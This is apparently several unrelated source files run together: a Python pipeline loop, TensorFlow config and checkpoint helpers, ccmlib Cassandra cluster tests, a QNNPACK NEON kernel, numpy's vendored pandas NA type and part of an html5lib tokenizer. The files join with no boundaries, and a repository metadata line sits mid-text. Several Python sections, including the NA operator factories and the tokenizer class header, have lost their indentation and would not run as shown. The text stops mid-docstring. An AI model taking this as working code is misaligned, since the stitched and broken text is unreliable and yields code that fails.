                if not e.has_port(edges[e][1]):
                    print 'Trying to connect undefined input port', e, edges[e][1]
                    sys.exit(1)
                e.connect_input(edges[e][1], e1)
    # Added so that incoming data is fed to every input adapter
    # should check if in exists and create it if it doesn't
    # because a user could remove the input port by accident
    inputEdges = []
    for n in nodes:
        if n.get_type() == 'ADAPTER':
            ie = Pype()
            n.connect_input('in', ie)
            inputEdges.append(ie)
    #nodes[0].connect_input('in', inputEdge)
    # Main loop: block on the channel, fan incoming data out to every
    # adapter, then drive the first tasklet (which cooperatively yields
    # to the rest of the pipeline).
    while True:
        data = ch.receive()
        for ie in inputEdges:
            ie.send(data)
        #inputEdge.send(data)
        try:
            tasks[0].run()
        except:
            # keep the scheduler alive even if a tasklet raises
            traceback.print_exc()
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
import ast
import re
import os
import logging
logger = logging.getLogger("logger")
def tvars_num():
    """Log every trainable variable and return the total parameter count."""
    logger.info("model variables:")
    total = 0
    for variable in tf.trainable_variables():
        logger.debug(variable)
        dims = variable.get_shape().as_list()
        total += np.prod(dims)
    logger.info('%2.2fM variables' % (total * 1e-6))
    return total
def read_flags(config, args):
    """Copy every non-None attribute of ``args`` onto ``config``.

    The string-valued flags drop_s/drop_h/max_update_norm are parsed with
    ast.literal_eval before assignment.  Returns ``config``.
    """
    literal_keys = ("drop_s", "drop_h", "max_update_norm")
    for key in sorted(vars(args)):
        val = getattr(args, key)
        if val is None:
            continue
        if key in literal_keys:
            val = ast.literal_eval(val)
        setattr(config, key, val)
    return config
def get_config(config_pool, config_name):
    """Look up a configuration object in ``config_pool`` by name.

    Raises ValueError for unknown names.
    """
    if config_name != "mos_gl":
        raise ValueError("Invalid model: %s", config_name)
    return config_pool.MosGLConfig()
def print_config(config):
    """Log every public attribute of ``config``, one per line."""
    lines = ["%s: %s" % (name, getattr(config, name))
             for name in dir(config) if not name.startswith('__')]
    logger.info('\n' + '\n'.join(lines))
def write_config(config, path):
    """Write every public attribute of ``config`` to ``path`` as
    'name: value' lines (one attribute per line, alphabetical order)."""
    attrs = [attr for attr in dir(config) if not attr.startswith('__')]
    # Renamed from `str` (which shadowed the builtin); the context manager
    # guarantees the file is closed even if write() raises.
    text = '\n'.join("%s: %s" % (item, getattr(config, item)) for item in attrs)
    with open(path, "w") as f:
        f.write(text)
def get_simulation_name(args):
    """Build a filesystem-friendly run name from the argument values.

    Attributes that are None or administrative (devices, checkpoint paths,
    verbosity flags, ...) are skipped; list-like string values are flattened
    into dash-separated tokens.
    """
    skipped = {"cpu_device", "gpu_devices", "start_layer", "ckpt_file",
               "save", "verbose", "nonmono", "debug"}
    parts = []
    for key in sorted(vars(args)):
        val = getattr(args, key)
        if val is None or key in skipped:
            continue
        token = str(val).replace(",", "-").replace(" ", "")
        token = token.replace("[", "").replace("]", "")
        parts.append("%s-%s" % (key, token))
    return "_".join(parts)
def get_gpu_devices(str):
    """Return the list of single-digit device ids found in ``str``.

    NOTE: matches each digit individually, so multi-digit ids are split.
    """
    return re.findall("[0-9]", str)
def get_vars2restore(layer, model):
    """Select the trainable variables to restore when growing to ``layer``.

    Returns None for the first layer (nothing to restore); otherwise returns
    embeddings, all LSTM layers below ``layer``, and -- when the new layer has
    the same hidden size as the previous one -- the mos/output variables.
    Matching is done on variable op names.
    """
    if layer == 1:
        return None
    else:
        vars2load = []
        logger.debug("vars to restore when adding new layer")
        for var in tf.trainable_variables():
            logger.debug(var.op.name)
            # Embedding matrices are shared across depths.
            if "embedding" in var.op.name:
                logger.debug("added")
                vars2load.append(var)
            # Recurrent layers are named "layer_<idx>"; restore only those
            # strictly below the layer being added.
            if "layer_" in var.op.name:
                lstm_idx = re.findall("layer_([0-9])+", var.op.name)
                if int(lstm_idx[0]) < layer:
                    vars2load.append(var)
                    logger.debug("added")
            # Mixture-of-softmaxes weights are shape-compatible only when the
            # top two hidden sizes match.
            if "mos" in var.op.name and model.hid_size[layer-1] == model.hid_size[layer-2]:
                logger.debug("added")
                vars2load.append(var)
            if "w_embed_out" in var.op.name:
                logger.debug("added")
                vars2load.append(var)
            if "b_out" in var.op.name:
                logger.debug("added")
                vars2load.append(var)
        return vars2load
def write_to_summary(sum_path, config, train, valid, test):
    """Append one CSV row of config values and perplexity scores to ``sum_path``.

    A header row is written first when the file does not exist yet.  The last
    entries of train/valid/test are treated as the totals and written first,
    followed by the remaining per-step scores in order.
    """
    attrs = sorted(attr for attr in dir(config) if not attr.startswith('__'))
    # BUG FIX: the old code tested os.path.exists(sum_path) but then always
    # opened the hard-coded "./summary.csv", silently ignoring the requested
    # path; it also never closed the file on error.  Open sum_path
    # consistently, via a context manager.
    write_header = not os.path.exists(sum_path)
    with open(sum_path, "a") as f:
        if write_header:
            header = list(attrs)
            header.extend(["train_perp_tot", "valid_perp_tot", "test_perp_tot",
                           "train_perp_0", "valid_perp_0", "test_perp_0"])
            f.write(",".join(header) + "\n")
        row = [str(getattr(config, a)).replace(",", "-").replace(" ", "")
               for a in attrs]
        scores = [[str(t), str(v), str(ts)] for t, v, ts in zip(train, valid, test)]
        row.extend(scores[-1])  # the totals are the last list entries
        scores.pop()
        row.extend(item for sublist in scores for item in sublist)
        f.write(",".join(row) + "\n")
def remove_tempstate_files(dir):
    """Yield full paths of every file whose name contains 'tempstate' under
    ``dir`` (searched recursively).

    Despite the name, this only enumerates candidates; the caller deletes.
    """
    for (folder, subs, files) in os.walk(dir):
        for filename in files:
            if "tempstate" in filename:
                # BUG FIX: join with the directory currently being walked
                # (`folder`), not the walk root (`dir`) -- files found in
                # subdirectories previously got a wrong, non-existent path.
                yield os.path.join(folder, filename)
import sys
from six import StringIO
import ccmlib
from ccmlib.cluster import Cluster
from . import TEST_DIR, ccmtest
# Make the parent directory importable when these tests are run directly.
sys.path = [".."] + sys.path
# All test clusters are created under the shared test directory.
CLUSTER_PATH = TEST_DIR
class TestCCMLib(ccmtest.Tester):
    """Smoke tests that drive a real local Cassandra cluster via ccmlib.

    Each test creates its own cluster under CLUSTER_PATH and assigns it to
    self.cluster so ccmtest.Tester's teardown can stop and remove it.
    """

    def restart_test(self):
        # NOTE(review): not named test_*, so unittest discovery skips it;
        # presumably invoked manually -- confirm this is intentional.
        self.cluster = Cluster(CLUSTER_PATH, "restart", cassandra_version='2.0.9')
        self.cluster.populate(3)
        self.cluster.start()
        # A full stop/start cycle must leave the cluster usable.
        self.cluster.stop()
        self.cluster.start()
        self.cluster.show(True)

    def test2(self):
        self.cluster = Cluster(CLUSTER_PATH, "test2", cassandra_version='2.0.3')
        self.cluster.populate(2)
        self.cluster.start()
        self.cluster.set_log_level("ERROR")

        # Exercise remove() with a node object the cluster does not know.
        class FakeNode:
            name = "non-existing node"

        self.cluster.remove(FakeNode())
        [node1, node2] = self.cluster.nodelist()
        self.cluster.remove(node1)
        self.cluster.show(True)
        self.cluster.show(False)
        #self.cluster.stress([])
        self.cluster.compact()
        self.cluster.drain()
        self.cluster.stop()

    def test3(self):
        # cleanup() and clear() should both succeed on a running cluster.
        self.cluster = Cluster(CLUSTER_PATH, "test3", cassandra_version='2.0.3')
        self.cluster.populate(2)
        self.cluster.start()
        self.cluster.cleanup()
        self.cluster.clear()
        self.cluster.stop()
class TestRunCqlsh(ccmtest.Tester):
    """Tests for Node.run_cqlsh's output-printing/-returning options."""

    def setUp(self):
        '''Create a cluster for cqlsh tests. Assumes that ccmtest.Tester's
        teardown() method will safely stop and remove self.cluster.'''
        self.cluster = Cluster(CLUSTER_PATH, "run_cqlsh",
                               cassandra_version='git:trunk')
        self.cluster.populate(1).start(wait_for_binary_proto=True)
        [self.node] = self.cluster.nodelist()

    def run_cqlsh_printing(self, return_output, show_output):
        '''Parameterized test. Runs run_cqlsh with options to print the output
        and to return it as a string, or with these options combined, depending
        on the values of the arguments.'''
        # redirect run_cqlsh's stdout to a string buffer
        old_stdout, sys.stdout = sys.stdout, StringIO()
        rv = self.node.run_cqlsh('DESCRIBE keyspaces;',
                                 return_output=return_output,
                                 show_output=show_output)
        # put stdout back where it belongs and get the built string value
        sys.stdout, printed_output = old_stdout, sys.stdout.getvalue()

        if return_output:
            # rv is a (stdout, stderr) pair when output is returned.
            # we should see names of system keyspaces
            self.assertIn('system', rv[0])
            # stderr should be empty
            self.assertEqual('', rv[1])
        else:
            # implicitly-returned None
            self.assertEqual(rv, None)

        if show_output:
            self.assertIn('system', printed_output)
        else:
            # nothing should be printed if (not show_output)
            self.assertEqual(printed_output, '')

        if return_output and show_output:
            # Printed and returned stdout must agree.
            self.assertEqual(printed_output, rv[0])
class TestNodeLoad(ccmtest.Tester):
    """Unit tests for ccmlib.node._get_load_from_info_output."""

    def test_rejects_multiple_load_lines(self):
        # Two "Load" lines in a single nodetool info blob is ambiguous.
        for info in ('Load : 699 KiB\nLoad : 35 GiB',
                     'Load : 699 KB\nLoad : 35 GB'):
            with self.assertRaises(RuntimeError):
                ccmlib.node._get_load_from_info_output(info)

    def test_rejects_unexpected_units(self):
        # Units beyond TB (and nonsense units) must be rejected.
        for info in ('Load : 200 PiB', 'Load : 200 PB', 'Load : 12 Parsecs'):
            with self.assertRaises(RuntimeError):
                ccmlib.node._get_load_from_info_output(info)

    def test_gets_correct_value(self):
        # Expected results are in KiB, hence the powers of 1024.
        cases = (('Load : 328.45 KiB', 328.45),
                 ('Load : 328.45 KB', 328.45),
                 ('Load : 295.72 MiB', 295.72 * 1024),
                 ('Load : 295.72 MB', 295.72 * 1024),
                 ('Load : 183.79 GiB', 183.79 * 1024 * 1024),
                 ('Load : 183.79 GB', 183.79 * 1024 * 1024),
                 ('Load : 82.333 TiB', 82.333 * 1024 * 1024 * 1024),
                 ('Load : 82.333 TB', 82.333 * 1024 * 1024 * 1024))
        for info, expected in cases:
            self.assertEqual(ccmlib.node._get_load_from_info_output(info),
                             expected)

    def test_with_full_info_output(self):
        # Full nodetool info output, once with IEC and once with SI units;
        # both spell 247.59 mebibytes and must parse identically.
        for unit in ('MiB', 'MB'):
            data = ('ID : 82800bf3-8c1a-4355-9b72-e19aa61d9fba\n'
                    'Gossip active : true\n'
                    'Thrift active : true\n'
                    'Native Transport active: true\n'
                    'Load : 247.59 ' + unit + '\n'
                    'Generation No : 1426190195\n'
                    'Uptime (seconds) : 526\n'
                    'Heap Memory (MB) : 222.83 / 495.00\n'
                    'Off Heap Memory (MB) : 1.16\n'
                    'Data Center : dc1\n'
                    'Rack : r1\n'
                    'Exceptions : 0\n'
                    'Key Cache : entries 41, size 3.16 KB, capacity 24 MB, 19 hits, 59 requests, 0.322 recent hit rate, 14400 save period in seconds\n'
                    'Row Cache : entries 0, size 0 bytes, capacity 0 bytes, 0 hits, 0 requests, NaN recent hit rate, 0 save period in seconds\n'
                    'Counter Cache : entries 0, size 0 bytes, capacity 12 MB, 0 hits, 0 requests, NaN recent hit rate, 7200 save period in seconds\n'
                    'Token : -9223372036854775808\n')
            self.assertEqual(ccmlib.node._get_load_from_info_output(data),
                             247.59 * 1024)
class TestErrorLogGrepping(ccmtest.Tester):
    """Unit tests for ccmlib.node._grep_log_for_errors."""

    def assertGreppedLog(self, log, grepped_log):
        # The grepper returns a list of groups; each group is the list of
        # lines belonging to one error (first line plus continuations).
        self.assertEqual(ccmlib.node._grep_log_for_errors(log), grepped_log)

    def test_basic_error_message(self):
        message = 'ERROR: You messed up'
        self.assertGreppedLog(message, [[message]])

    def test_error_message_with_timestamp(self):
        message = '2015-05-12 14:12:12,720 ERROR: You messed up'
        self.assertGreppedLog(message, [[message]])

    def test_filter_debug_lines(self):
        self.assertGreppedLog('DEBUG: harmless warning message\n', [])

    def test_ignore_empty_lines(self):
        log = ('\n'
               'ERROR: Node unavailable')
        self.assertGreppedLog(log, [['ERROR: Node unavailable']])

    def test_ignore_debug_lines_containing_error(self):
        self.assertGreppedLog(
            'DEBUG: another process raised: ERROR: abandon hope!\n', [])

    def test_coalesces_stack_trace_lines(self):
        log = ('ERROR: You have made a terrible mistake\n'
               ' And here are more details on what you did\n'
               'saints preserve us')
        expected = [['ERROR: You have made a terrible mistake',
                     ' And here are more details on what you did',
                     'saints preserve us']]
        self.assertGreppedLog(log, expected)

    def test_multiple_errors(self):
        log = ('ERROR: You have made a terrible mistake\n'
               ' And here are more details on what you did\n'
               'INFO: Node joined ring\n'
               'ERROR: not again!')
        expected = [['ERROR: You have made a terrible mistake',
                     ' And here are more details on what you did'],
                    ['ERROR: not again!']]
        self.assertGreppedLog(log, expected)

    def test_consecutive_errors(self):
        log = ('ERROR: You have made a terrible mistake\n'
               ' And here are more details on what you did\n'
               'INFO: Node joined ring\n'
               'ERROR: not again!\n'
               ' And, yup, here is some more details\n'
               'ERROR: ugh, and a third one!')
        expected = [['ERROR: You have made a terrible mistake',
                     ' And here are more details on what you did'],
                    ['ERROR: not again!',
                     ' And, yup, here is some more details'],
                    ['ERROR: ugh, and a third one!']]
        self.assertGreppedLog(log, expected)

    def test_does_not_coalesce_info_lines(self):
        log = ('ERROR: You have made a terrible mistake\n'
               ' 2015-05-12 14:12:12,720 INFO: why would you ever do that\n')
        self.assertGreppedLog(log, [['ERROR: You have made a terrible mistake']])

    def test_finds_exceptions_logged_as_warn(self):
        warn1 = ('WARN [ReadStage-2] 2017-03-20 13:29:39,165 AbstractLocalAwareExecutorService.java:167 - '
                 'Uncaught exception on thread Thread[ReadStage-2,5,main]: {} java.lang.AssertionError: Lower bound '
                 '[INCL_START_BOUND(HistLoss, -9223372036854775808, -9223372036854775808) ]is bigger than '
                 'first returned value')
        warn2 = ('WARN [MessagingService-Incoming-/IP] 2017-05-26 19:27:11,523 IncomingTcpConnection.java:101 - '
                 'UnknownColumnFamilyException reading from socket; closing org.apache.cassandra.db.'
                 'UnknownColumnFamilyException: Couldnt find table for cfId 922b7940-3a65-11e7-adf3-a3ff55d9bcf1. '
                 'If a table was just created, this is likely due to the schema not being fully propagated. '
                 'Please wait for schema agreement on table creation.')
        # Plain failure wording in a WARN line is NOT picked up...
        warn3 = 'WARN oh no there was an error, it failed, with a failure'
        # ...but the word "exception" is.
        warn4 = 'WARN there was an exception!!!'

        log = '\n'.join([warn1, warn2, warn3, warn4])
        self.assertGreppedLog(log, [[warn1], [warn2], [warn4]])
/*
* Copyright (c) Facebook, Inc. and its affiliates.
* All rights reserved.
*
* This source code is licensed under the BSD-style license found in the
* LICENSE file in the root directory of this source tree.
*/
#include <assert.h>
#include <arm_neon.h>
#include <qnnpack/u8rmax.h>
/*
 * Returns the maximum of the n bytes starting at x (n must be non-zero),
 * using ARM NEON: the main loop folds 16 bytes per iteration into a vector
 * maximum, the tail is handled by one overlapping 16-byte load, and the
 * vector is then reduced pairwise to a single byte.
 */
uint8_t pytorch_u8rmax_ukernel__neon(size_t n, const uint8_t* x) {
  assert(n != 0);

  if
    PYTORCH_QNNP_LIKELY(n >= 16) {
      /* Running 16-lane maximum; 0 is the identity for unsigned max. */
      uint8x16_t vmax = vmovq_n_u8(0);
      do {
        const uint8x16_t vx = vld1q_u8(x);
        x += 16;
        vmax = vmaxq_u8(vmax, vx);
        n -= 16;
      } while (n >= 16);
      if (n != 0) {
        /* 0 < n < 16 bytes remain.  n - 16 wraps around as size_t, so the
         * addition below effectively moves x BACK by (16 - n) bytes: the
         * final full 16-byte load covers the tail while re-reading bytes
         * already folded into vmax, which is harmless since max is
         * idempotent. */
        const size_t x_increment = n - 16;
        x = (const uint8_t*)((uintptr_t)x + x_increment);
        const uint8x16_t vx = vld1q_u8(x);
        vmax = vmaxq_u8(vmax, vx);
      }
      /* Pairwise reduction: 16 lanes -> 8 -> 4 -> 2 -> 1. */
      uint8x8_t vmax8 = vmax_u8(vget_low_u8(vmax), vget_high_u8(vmax));
      const uint8x8_t vmax4 = vpmax_u8(vmax8, vmax8);
      const uint8x8_t vmax2 = vpmax_u8(vmax4, vmax4);
      const uint8x8_t vmax1 = vpmax_u8(vmax2, vmax2);
      return vget_lane_u8(vmax1, 0);
    }
  else {
    /* Fewer than 16 bytes: scalar-ish loop, one byte per iteration
     * broadcast into an 8-lane register. */
    uint8x8_t vmax = vmov_n_u8(0);
    do {
      const uint8x8_t vx = vld1_dup_u8(x);
      x += 1;
      vmax = vmax_u8(vmax, vx);
    } while (--n != 0);
    return vget_lane_u8(vmax, 0);
  }
}
# Vendored implementation of pandas.NA, adapted from pandas/_libs/missing.pyx
#
# This is vendored to avoid adding pandas as a test dependency.
__all__ = ["pd_NA"]
import numbers
import numpy as np
def _create_binary_propagating_op(name, is_divmod=False):
is_cmp = name.strip("_") in ["eq", "ne", "le", "lt", "ge", "gt"]
def method(self, other):
if (
other is pd_NA
or isinstance(other, (str, bytes, numbers.Number, np.bool))
or (isinstance(other, np.ndarray) and not other.shape)
):
# Need the other.shape clause to handle NumPy scalars,
# since we do a setitem on `out` below, which
# won't work for NumPy scalars.
if is_divmod:
return pd_NA, pd_NA
else:
return pd_NA
elif isinstance(other, np.ndarray):
out = np.empty(other.shape, dtype=object)
out[:] = pd_NA
if is_divmod:
return out, out.copy()
else:
return out
elif is_cmp and isinstance(other, (np.datetime64, np.timedelta64)):
return pd_NA
elif isinstance(other, np.datetime64):
if name in ["__sub__", "__rsub__"]:
return pd_NA
elif isinstance(other, np.timedelta64):
if name in ["__sub__", "__rsub__", "__add__", "__radd__"]:
return pd_NA
return NotImplemented
method.__name__ = name
return method
def _create_unary_propagating_op(name: str):
def method(self):
return pd_NA
method.__name__ = name
return method
class NAType:
    """Missing-value marker mirroring pandas.NA (vendored for tests).

    Arithmetic and comparisons propagate NA via the _create_*_op factories;
    boolean operators use three-valued (Kleene) logic; truth-testing raises
    because NA is neither True nor False.
    """

    def __repr__(self) -> str:
        return "<NA>"

    def __format__(self, format_spec) -> str:
        # Fall back to the plain repr for format specs that don't apply
        # to strings (e.g. numeric specs like ".2f").
        try:
            return self.__repr__().__format__(format_spec)
        except ValueError:
            return self.__repr__()

    def __bool__(self):
        raise TypeError("boolean value of NA is ambiguous")

    def __hash__(self):
        # Fixed hash so NA is usable as a dict key / set member and hashes
        # consistently across sessions (value chosen to match pandas' NA
        # -- TODO confirm against the pandas source).
        return 2**61 - 1

    def __reduce__(self):
        # Pickle back to the module-level singleton.
        return "pd_NA"

    # Binary arithmetic and comparison ops -> propagate
    __add__ = _create_binary_propagating_op("__add__")
    __radd__ = _create_binary_propagating_op("__radd__")
    __sub__ = _create_binary_propagating_op("__sub__")
    __rsub__ = _create_binary_propagating_op("__rsub__")
    __mul__ = _create_binary_propagating_op("__mul__")
    __rmul__ = _create_binary_propagating_op("__rmul__")
    __matmul__ = _create_binary_propagating_op("__matmul__")
    __rmatmul__ = _create_binary_propagating_op("__rmatmul__")
    __truediv__ = _create_binary_propagating_op("__truediv__")
    __rtruediv__ = _create_binary_propagating_op("__rtruediv__")
    __floordiv__ = _create_binary_propagating_op("__floordiv__")
    __rfloordiv__ = _create_binary_propagating_op("__rfloordiv__")
    __mod__ = _create_binary_propagating_op("__mod__")
    __rmod__ = _create_binary_propagating_op("__rmod__")
    __divmod__ = _create_binary_propagating_op("__divmod__", is_divmod=True)
    __rdivmod__ = _create_binary_propagating_op("__rdivmod__", is_divmod=True)
    # __lshift__ and __rshift__ are not implemented

    __eq__ = _create_binary_propagating_op("__eq__")
    __ne__ = _create_binary_propagating_op("__ne__")
    __le__ = _create_binary_propagating_op("__le__")
    __lt__ = _create_binary_propagating_op("__lt__")
    __gt__ = _create_binary_propagating_op("__gt__")
    __ge__ = _create_binary_propagating_op("__ge__")

    # Unary ops
    __neg__ = _create_unary_propagating_op("__neg__")
    __pos__ = _create_unary_propagating_op("__pos__")
    __abs__ = _create_unary_propagating_op("__abs__")
    __invert__ = _create_unary_propagating_op("__invert__")

    # Logical ops using Kleene logic
    def __and__(self, other):
        # NA & False is False; NA & True and NA & NA stay NA.
        if other is False:
            return False
        elif other is True or other is pd_NA:
            return pd_NA
        return NotImplemented

    __rand__ = __and__

    def __or__(self, other):
        # NA | True is True; NA | False and NA | NA stay NA.
        if other is True:
            return True
        elif other is False or other is pd_NA:
            return pd_NA
        return NotImplemented

    __ror__ = __or__

    def __xor__(self, other):
        # XOR with NA is always indeterminate.
        if other is False or other is True or other is pd_NA:
            return pd_NA
        return NotImplemented

    __rxor__ = __xor__
pd_NA = NAType() | python | github | https://github.com/numpy/numpy | numpy/_core/tests/_natype.py |
try:
frozenset
except NameError:
# Import from the sets module for python 2.3
from sets import Set as set
from sets import ImmutableSet as frozenset
try:
from collections import deque
except ImportError:
from utils import deque
from constants import contentModelFlags, spaceCharacters
from constants import entitiesWindows1252, entities
from constants import asciiLowercase, asciiLetters, asciiUpper2Lower
from constants import digits, hexDigits, EOF
from constants import tokenTypes, tagTokenTypes
from inputstream import HTMLInputStream
# Group entities by their first character, for faster lookups
# (consumeEntity narrows the candidate entity names by leading character).
entitiesByFirstChar = {}
for e in entities:
    entitiesByFirstChar.setdefault(e[0], []).append(e)
class HTMLTokenizer:
""" This class takes care of tokenizing HTML.
* self.currentToken
Holds the token that is currently being processed.
* self.state
Holds a reference to the method to be invoked... XXX
* self.states
Holds a mapping between states and methods that implement the state.
* self.stream
Points to HTMLInputStream object.
"""
# XXX need to fix documentation
    def __init__(self, stream, encoding=None, parseMeta=True, useChardet=True,
                 lowercaseElementName=True, lowercaseAttrName=True):
        """Wrap `stream` in an HTMLInputStream and set up the state machine.

        `encoding`, `parseMeta` and `useChardet` are forwarded to
        HTMLInputStream; the two lowercase* flags control case normalisation
        of emitted tag and attribute names.
        """
        self.stream = HTMLInputStream(stream, encoding, parseMeta, useChardet)
        #Perform case conversions?
        self.lowercaseElementName = lowercaseElementName
        self.lowercaseAttrName = lowercaseAttrName
        # Dispatch table: state name -> bound method implementing that state.
        self.states = {
            "data":self.dataState,
            "entityData":self.entityDataState,
            "tagOpen":self.tagOpenState,
            "closeTagOpen":self.closeTagOpenState,
            "tagName":self.tagNameState,
            "beforeAttributeName":self.beforeAttributeNameState,
            "attributeName":self.attributeNameState,
            "afterAttributeName":self.afterAttributeNameState,
            "beforeAttributeValue":self.beforeAttributeValueState,
            "attributeValueDoubleQuoted":self.attributeValueDoubleQuotedState,
            "attributeValueSingleQuoted":self.attributeValueSingleQuotedState,
            "attributeValueUnQuoted":self.attributeValueUnQuotedState,
            "afterAttributeValue":self.afterAttributeValueState,
            "selfClosingStartTag":self.selfClosingStartTagState,
            "bogusComment":self.bogusCommentState,
            "bogusCommentContinuation":self.bogusCommentContinuationState,
            "markupDeclarationOpen":self.markupDeclarationOpenState,
            "commentStart":self.commentStartState,
            "commentStartDash":self.commentStartDashState,
            "comment":self.commentState,
            "commentEndDash":self.commentEndDashState,
            "commentEnd":self.commentEndState,
            "commentEndBang":self.commentEndBangState,
            "commentEndSpace":self.commentEndSpaceState,
            "doctype":self.doctypeState,
            "beforeDoctypeName":self.beforeDoctypeNameState,
            "doctypeName":self.doctypeNameState,
            "afterDoctypeName":self.afterDoctypeNameState,
            "beforeDoctypePublicIdentifier":self.beforeDoctypePublicIdentifierState,
            "doctypePublicIdentifierDoubleQuoted":self.doctypePublicIdentifierDoubleQuotedState,
            "doctypePublicIdentifierSingleQuoted":self.doctypePublicIdentifierSingleQuotedState,
            "afterDoctypePublicIdentifier":self.afterDoctypePublicIdentifierState,
            "beforeDoctypeSystemIdentifier":self.beforeDoctypeSystemIdentifierState,
            "doctypeSystemIdentifierDoubleQuoted":self.doctypeSystemIdentifierDoubleQuotedState,
            "doctypeSystemIdentifierSingleQuoted":self.doctypeSystemIdentifierSingleQuotedState,
            "afterDoctypeSystemIdentifier":self.afterDoctypeSystemIdentifierState,
            "bogusDoctype":self.bogusDoctypeState
        }
        # Setup the initial tokenizer state
        self.contentModelFlag = contentModelFlags["PCDATA"]
        self.escapeFlag = False
        self.lastFourChars = []
        self.state = self.dataState
        self.escape = False
        # The current token being created
        self.currentToken = None
    def __iter__(self):
        """ This is where the magic happens.

        We do our usually processing through the states and when we have a token
        to return we yield the token which pauses processing until the next token
        is requested.
        """
        self.tokenQueue = deque([])
        # Start processing. When EOF is reached self.state will return False
        # instead of True and the loop will terminate.
        while self.state():
            # Surface any pending input-stream errors before real tokens.
            while self.stream.errors:
                yield {"type": tokenTypes["ParseError"], "data": self.stream.errors.pop(0)}
            while self.tokenQueue:
                yield self.tokenQueue.popleft()
    def consumeNumberEntity(self, isHex):
        """This function returns either U+FFFD or the character based on the
        decimal or hexadecimal representation. It also discards ";" if present.
        If not present self.tokenQueue.append({"type": tokenTypes["ParseError"]}) is invoked.
        """
        allowed = digits
        radix = 10
        if isHex:
            allowed = hexDigits
            radix = 16
        charStack = []
        # Consume all the characters that are in range while making sure we
        # don't hit an EOF.
        c = self.stream.char()
        while c in allowed and c is not EOF:
            charStack.append(c)
            c = self.stream.char()
        # Convert the set of characters consumed to an int.
        charAsInt = int("".join(charStack), radix)
        # A carriage return reference is normalised to a line feed.
        if charAsInt == 13:
            self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
                "incorrect-cr-newline-entity"})
            charAsInt = 10
        elif 127 < charAsInt < 160:
            # If the integer is between 127 and 160 (so 128 and bigger and 159
            # and smaller) we need to do the "windows trick".
            self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
                "illegal-windows-1252-entity"})
            charAsInt = entitiesWindows1252[charAsInt - 128]
        # Certain characters get replaced with U+FFFD
        # (control chars, surrogates, non-characters, out-of-range values).
        if ((charAsInt <= 0x0008) or (charAsInt == 0x000B) or (0x000E <= charAsInt <= 0x001F)
            or (0x007F <= charAsInt <= 0x009F)
            or (0xD800 <= charAsInt <= 0xDFFF) or (0xFDD0 <= charAsInt <= 0xFDEF)
            or (charAsInt & 0xFFFE == 0xFFFE) # catch all U+?FFFE and U+?FFFF, where ? is 0..10
            or (0x10FFFF < charAsInt)):
            char = u"\uFFFD"
            self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
                "illegal-codepoint-for-numeric-entity",
                "datavars": {"charAsInt": charAsInt}})
        else:
            try:
                # XXX We should have a separate function that does "int" to
                # "unicodestring" conversion since this doesn't always work
                # according to hsivonen. Also, unichr has a limitation of 65535
                char = unichr(charAsInt)
            except:
                try:
                    # Narrow-build fallback: build the astral character via eval.
                    char = eval("u'\\U%08x'" % charAsInt)
                except:
                    # NOTE(review): if both conversions fail, `char` is left
                    # unbound and the return below raises NameError -- confirm
                    # this path is unreachable in practice.
                    self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
                        "cant-convert-numeric-entity",
                        "datavars": {"charAsInt": charAsInt}})
        # Discard the ; if present. Otherwise, put it back on the queue and
        # invoke parseError on parser.
        if c != u";":
            self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
                "numeric-entity-without-semicolon"})
            self.stream.unget(c)
        return char
    def consumeEntity(self, allowedChar=None, fromAttribute=False):
        """Consume a character reference following "&".

        The decoded text is appended to the current attribute value when
        `fromAttribute` is true, otherwise emitted as a Characters token.
        `allowedChar` is an additional character (e.g. the attribute value's
        quote) after which no entity processing is attempted.
        """
        # Initialise to the default output for when no entity is matched
        output = u"&"
        charStack = [self.stream.char()]
        # A bare "&" before whitespace, EOF, "<", "&" or the allowed char is
        # just literal text: put the character back and emit "&" as-is.
        if charStack[0] in spaceCharacters or charStack[0] in (EOF, u"<", u"&") \
                or (allowedChar is not None and allowedChar == charStack[0]):
            self.stream.unget(charStack[0])
        elif charStack[0] == u"#":
            # Read the next character to see if it's hex or decimal
            hex = False
            charStack.append(self.stream.char())
            if charStack[-1] in (u"x", u"X"):
                hex = True
                charStack.append(self.stream.char())
            # charStack[-1] should be the first digit
            if (hex and charStack[-1] in hexDigits) \
                    or (not hex and charStack[-1] in digits):
                # At least one digit found, so consume the whole number
                self.stream.unget(charStack[-1])
                output = self.consumeNumberEntity(hex)
            else:
                # No digits found
                self.tokenQueue.append({"type": tokenTypes["ParseError"],
                    "data": "expected-numeric-entity"})
                self.stream.unget(charStack.pop())
                output = u"&" + u"".join(charStack)
        else:
            # At this point in the process might have named entity. Entities
            # are stored in the global variable "entities".
            #
            # Consume characters and compare to these to a substring of the
            # entity names in the list until the substring no longer matches.
            filteredEntityList = entitiesByFirstChar.get(charStack[0], [])
            def entitiesStartingWith(name):
                return [e for e in filteredEntityList if e.startswith(name)]
            while charStack[-1] is not EOF and\
                    entitiesStartingWith("".join(charStack)):
                charStack.append(self.stream.char())
            # At this point we have a string that starts with some characters
            # that may match an entity
            entityName = None
            # Try to find the longest entity the string will match to take care
            # of &noti for instance.
            for entityLength in xrange(len(charStack)-1, 1, -1):
                possibleEntityName = "".join(charStack[:entityLength])
                if possibleEntityName in entities:
                    entityName = possibleEntityName
                    break
            if entityName is not None:
                if entityName[-1] != ";":
                    self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
                        "named-entity-without-semicolon"})
                # In attributes, a semicolon-less entity followed by an
                # alphanumeric character is treated as literal text.
                if entityName[-1] != ";" and fromAttribute and \
                        (charStack[entityLength] in asciiLetters
                        or charStack[entityLength] in digits):
                    self.stream.unget(charStack.pop())
                    output = u"&" + u"".join(charStack)
                else:
                    output = entities[entityName]
                    self.stream.unget(charStack.pop())
                    output += u"".join(charStack[entityLength:])
            else:
                self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
                    "expected-named-entity"})
                self.stream.unget(charStack.pop())
                output = u"&" + u"".join(charStack)
        if fromAttribute:
            self.currentToken["data"][-1][1] += output
        else:
            self.tokenQueue.append({"type": tokenTypes["Characters"], "data": output})
def processEntityInAttribute(self, allowedChar):
"""This method replaces the need for "entityInAttributeValueState".
"""
self.consumeEntity(allowedChar=allowedChar, fromAttribute=True)
def emitCurrentToken(self):
"""This method is a generic handler for emitting the tags. It also sets
the state to "data" because that's what's needed after a token has been
